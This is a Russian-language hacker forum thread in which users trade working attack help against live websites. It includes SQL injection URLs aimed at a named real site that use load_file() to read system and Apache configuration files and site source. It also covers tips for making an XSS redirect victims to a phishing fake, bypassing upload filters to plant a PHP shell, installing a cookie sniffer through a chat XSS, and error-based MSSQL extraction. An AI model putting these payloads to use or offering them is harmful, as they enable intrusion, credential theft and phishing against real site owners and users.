Всем привет можно ли это как нибудь обойти? PHP: $kat = htmlspecialchars($kat); $kat = str_replace('.','',$kat); $kat = str_replace('/','',$kat); if ($_GET[file]) { file("$kat/$file1"); }
Code: http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('c:/boot.ini'),3,4,5,6,7,8,9,10,11,12+from+mysql.user искать абсолютные пути, брутить
просто брутить, известными программами или своим скриптом *тулза умеет, только для винды там словарь говеный*
Паша, тебе лишь-бы логи засрать своей чудо программой. Ну сколько-же тебя просить не учить людей всякой херне =\ LokbatanLi http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/conf/httpd.conf'),3,4,5,6,7,8,9,10,11,12+from+mysql.user http://www.mission.am/am/past/program.php?ID=-1+union+select+1,load_file('C:/Program Files/Apache Group/Apache2/htdocs/mission/index.php'),3,4,5,6,7,8,9,10,11,12+from+mysql.user PS Если там "случайно" окажется дефейс от турецких хакеров, ты тут больше советов не проси пожалуйста
У меня имееться xss. Я сделал чтобы была автоматическая переадресация на мой фейк таким образом: HTML: style=background:url('//') onerror=document.write Но это работает только в опере Для ie & firefox я сделал чтобы при наведении на текст переадресовывало на фейк: HTML: onmouseover=document.write Как сделать чтоб переадресация была автоматически в ie & firefox?
Помогтье загрузить шелл!Грузятся только изображния!остальное просто режется. файл типа shell.php режется к виду [какое либо число] без расширения т.е. shell.php будет подимене 8 без расширения shell.php.php shell.php%00.jpg .htaccess не катят
wildshaman спс за ответ! какойто из способов помог!! оказалось зря шелл грузил и парился ((( очень суровые там условия!
если я в каком либо чате нашёл XSS которая реагирует когда выполняется код (ппросмотр чата) то могу ли я туда сниффер поставить ?
есть пароль и логин о мускуля сайта. можно ли подключиться к нему? какой клиент посоветуете? phpmyadmin на сайте нет, через веб-интерфейс никак...
Всё зависит от пользователя MySQL. Если имя <имя>@localhost, то это значит, что удаленно подключится никак нельзя, лишь с локальной машины (если не ошибаюсь, то root@localhost - исключение. К нему можно подключаться удаленно). В таком случае можно только через шелл на сайте. Есть много хороших статей. Гугли "удаленное подключение MySQL". Самая первая неплохая.
ну если надо вывести int через провоцирование ошибки, то тогда наоборот пробовать convert(text,(запрос)) или convert(char,(запрос))
Кто знает как вывести int значение в mssql инже. Т.е. есть табличка которую нужно проверить на записать (т.е. update). Но так как там все значения int, не получается проверить даже по условию. Пробывал кучу всего. Значения там точно есть, потому что я могу их использовать в условии и они работают. Вообщем у кого есть опыт по сабжу, прошу поделится. зы. Так как написал, Паша, не работает. зы2. Есть, я сделал это.. Через преобразования данных в xml. Т.е. (в конце просто дописуем - FOR XML RAW)
Вообщем есть уязвимый скуль, доступен load_file() прочитал httpd.conf виртуал хост не прописан. есть ток Include /etc/apache2/sites-enabled/ пробовал прочитать /etc/apache2/sites-enabled/default пусто... попробовал /etc/apache2/sites-enabled/000-default выдает след единственная полезная запись DocumentRoot /srv/http/ пробую подставлять папки и файлы куча не соответствий... вообщем не то.. и похожей директории не получается отыскать... может есть еще варианты узнать реальный путь
